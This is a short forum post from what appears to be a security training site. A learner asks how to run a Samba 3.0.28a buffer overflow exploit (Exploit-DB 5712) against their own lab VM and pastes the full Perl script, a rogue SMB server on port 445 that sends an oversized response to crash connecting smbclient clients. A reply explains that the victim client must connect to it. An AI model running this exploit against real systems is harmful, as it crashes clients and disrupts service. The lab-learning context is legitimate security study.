Home 0P3N Blog Samba Buffer Overflow Exploit
Ready to Start Your Career?
Create Free Account
authors profile image
January 1, 2016

Samba Buffer Overflow Exploit

January 1, 2016
authors profile image
January 1, 2016
I've Googled to my wits end. I can't find an example of how to actually utilize this particular buffer overflow. I have a VM running Samba 3.0.28a - vulnerable to a buffer overflow. The exploit can be found in Kali at /usr/share/exploitdb/platforms/multiple/dos/5712.pl. How can I actually USE the code? I can't figure out what I need to do to run the exploit against my vulnerable VM from Kali. Running the perl script yields nothing. Can anyone please shed light on this? The code for the exploit is below: #!/usr/bin/perl # 06/01/2008 - k`sOSe # # ~ # smbclient //localhost/w00t # \*\*\* glibc detected \*\*\* smbclient: free(): invalid next size (fast): 0x0823c2d8 \*\*\* # use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); while(my $csock = $sock->accept()) { print $csock "\\x00" . "\\x01\\xff\\xff" . "\\x41" x 131071; } Hi there! Please provide a CVE ID too when you post public exploit code. ```my $sock = IO::Socket::INET->new(LocalAddr => ‘0.0.0.0’, LocalPort => ‘445’, Listen => 1, Reuse => 1) || die($!);``` Looks like a Server is being started for the service. So you have to connect the vulnerable machine's Client to your Sever
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry